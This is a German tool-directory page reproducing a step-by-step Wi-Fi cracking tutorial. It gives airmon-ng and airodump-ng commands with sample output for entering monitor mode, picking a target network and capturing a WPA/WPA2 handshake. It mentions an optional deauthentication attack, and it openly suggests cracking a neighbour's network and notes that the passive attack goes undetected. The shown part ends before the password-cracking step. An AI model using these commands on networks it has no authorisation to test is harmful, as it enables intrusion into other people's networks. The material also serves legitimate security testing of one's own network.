Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
wifi-cracking — Knacken Sie WPA/WPA2-WLAN-Router mit Airodump-ng und Aircrack-ng/Hashcat | Kitploit
Tools/GitHubGitHub/brannondorsey/wifi-cracking
Passwort-CrackingWi-Fi-PrüfungLernen & Bildung
GitHubbrannondorsey/wifi-cracking

wifi-cracking

Knacken Sie WPA/WPA2-WLAN-Router mit Airodump-ng und Aircrack-ng/Hashcat

Repository anzeigen
12.6k1.2k121vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Wi-Fi-Knacken

Knacken von WPA/WPA2-Wi-Fi-Routern mit Airodump-ng und Aircrack-ng/Hashcat.

Dies ist eine kurze Schritt-für-Schritt-Anleitung, die zeigt, wie man Wi-Fi-Netzwerke knackt, die mit schwachen Passwörtern gesichert sind. Sie ist nicht vollständig, sollte aber genügend Informationen liefern, um die Sicherheit des eigenen Netzwerks zu testen oder ein benachbartes zu knacken. Der unten beschriebene Angriff ist vollständig passiv (nur Mithören, es wird nichts von Ihrem Computer gesendet) und kann nicht erkannt werden, sofern Sie das geknackte Passwort nicht tatsächlich verwenden. Ein optionaler aktiver Deauthentifizierungsangriff kann verwendet werden, um den Aufklärungsprozess zu beschleunigen und wird am Ende dieses Dokuments beschrieben.

Wenn Sie mit diesem Prozess vertraut sind, können Sie die Beschreibungen überspringen und direkt zur Liste der verwendeten Befehle am Ende springen. Für eine Vielzahl von Vorschlägen und alternativen Methoden siehe den Anhang. neal1991 und tiiime haben ebenfalls freundlicherweise Übersetzungen dieses Dokuments und des Anhangs ins Chinesische zur Verfügung gestellt, falls Sie diese Versionen bevorzugen.

HAFTUNGSAUSSCHLUSS: Diese Software/dieses Tutorial dient ausschließlich zu Bildungszwecken. Sie sollte nicht für illegale Aktivitäten verwendet werden. Der Autor ist nicht verantwortlich für die Nutzung. Seien Sie kein Idiot.

Erste Schritte

Dieses Tutorial setzt voraus, dass Sie:

  • Grundlegende Vertrautheit mit der Kommandozeile haben
  • Eine Debian-basierte Linux-Distribution verwenden, vorzugsweise Kali Linux (OSX-Benutzer siehe Anhang)
  • Aircrack-ng installiert haben
    • sudo apt-get install aircrack-ng
  • Eine WLAN-Karte besitzen, die den Monitor-Modus unterstützt (siehe hier für eine Liste unterstützter Geräte)

Knacken eines Wi-Fi-Netzwerks

Monitor-Modus

Beginnen Sie, indem Sie die drahtlosen Schnittstellen auflisten, die den Monitor-Modus unterstützen, mit:

airmon-ng

Wenn Sie keine aufgeführte Schnittstelle sehen, unterstützt Ihre WLAN-Karte den Monitor-Modus nicht 😞

Wir gehen davon aus, dass der Name Ihrer drahtlosen Schnittstelle wlan0 ist, aber stellen Sie sicher, dass Sie den korrekten Namen verwenden, falls er davon abweicht. Als Nächstes versetzen wir die Schnittstelle in den Monitor-Modus:

airmon-ng start wlan0

Führen Sie iwconfig aus. Sie sollten nun eine neue Monitor-Modus-Schnittstelle sehen (wahrscheinlich mon0 oder wlan0mon).

Ihr Ziel finden

Beginnen Sie damit, 802.11-Beacon-Frames zu belauschen, die von nahegelegenen WLAN-Routern ausgesendet werden, unter Verwendung Ihrer Monitor-Schnittstelle:

airodump-ng mon0

Sie sollten eine Ausgabe ähnlich der folgenden sehen.

CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49                                         
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 14:91:82:F7:52:EB  -66      205       26    0   1  54e  OPN              belkin.2e8.guests                                                   
 14:91:82:F7:52:E8  -64      212       56    0   1  54e  WPA2 CCMP   PSK  belkin.2e8                                                          
 14:22:DB:1A:DB:64  -81       44        7    0   1  54   WPA2 CCMP        <length:  0>                                                        
 14:22:DB:1A:DB:66  -83       48        0    0   1  54e. WPA2 CCMP   PSK  steveserro                                                          
 9C:5C:8E:C9:AB:C0  -81       19        0    0   3  54e  WPA2 CCMP   PSK  hackme                                                                 
 00:23:69:AD:AF:94  -82      350        4    0   1  54e  WPA2 CCMP   PSK  Kaitlin's Awesome                                                   
 06:26:BB:75:ED:69  -84      232        0    0   1  54e. WPA2 CCMP   PSK  HH2                                                                 
 78:71:9C:99:67:D0  -82      339        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-67D2                                                          
 9C:34:26:9F:2E:E8  -85       40        0    0   1  54e. WPA2 CCMP   PSK  Comcast_2EEA-EXT                                                    
 BC:EE:7B:8F:48:28  -85      119       10    0   1  54e  WPA2 CCMP   PSK  root                                                                
 EC:1A:59:36:AD:CA  -86      210       28    0   1  54e  WPA2 CCMP   PSK  belkin.dca

Für die Zwecke dieser Demo wählen wir, das Passwort meines Netzwerks "hackme" zu knacken. Merken Sie sich die BSSID-MAC-Adresse und die Kanalnummer (CH), wie von airodump-ng angezeigt, da wir beide für den nächsten Schritt benötigen.

Einen 4-Wege-Handshake erfassen

WPA/WPA2 verwendet einen 4-Wege-Handshake, um Geräte im Netzwerk zu authentifizieren. Sie müssen nichts darüber wissen, aber Sie müssen einen dieser Handshakes erfassen, um das Netzwerkpasswort zu knacken. Diese Handshakes treten immer dann auf, wenn ein Gerät eine Verbindung zum Netzwerk herstellt, zum Beispiel wenn Ihr Nachbar von der Arbeit nach Hause kommt. Wir erfassen diesen Handshake, indem wir airodump-ng anweisen, den Datenverkehr im Zielnetzwerk zu überwachen, unter Verwendung der Kanal- und BSSID-Werte, die mit dem vorherigen Befehl ermittelt wurden.

# Ersetzen Sie -c und --bssid durch die Werte Ihres Zielnetzwerks
# -w gibt das Verzeichnis an, in dem wir die Paketerfassung speichern
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
 CH  6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]                                        
                                                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 9C:5C:8E:C9:AB:C0  -47   0      140        0    0   6  54e  WPA2 CCMP   PSK  ASUS  

Jetzt warten wir... Sobald Sie einen Handshake erfasst haben, sollten Sie etwa [ WPA handshake: bc:d3:c9:ef:d2:67 oben rechts auf dem Bildschirm sehen, direkt rechts von der aktuellen Uhrzeit.

Wenn Sie ungeduldig sind und sich mit einem aktiven Angriff wohlfühlen, können Sie mit dem Zielnetzwerk verbundene Geräte zwingen, sich erneut zu verbinden, indem Sie bösartige Deauthentifizierungspakete an sie senden. Dies führt oft zur Erfassung eines 4-Wege-Handshakes. Siehe den Abschnitt über Deauth-Angriffe weiter unten für Informationen dazu.

Tool herunterladen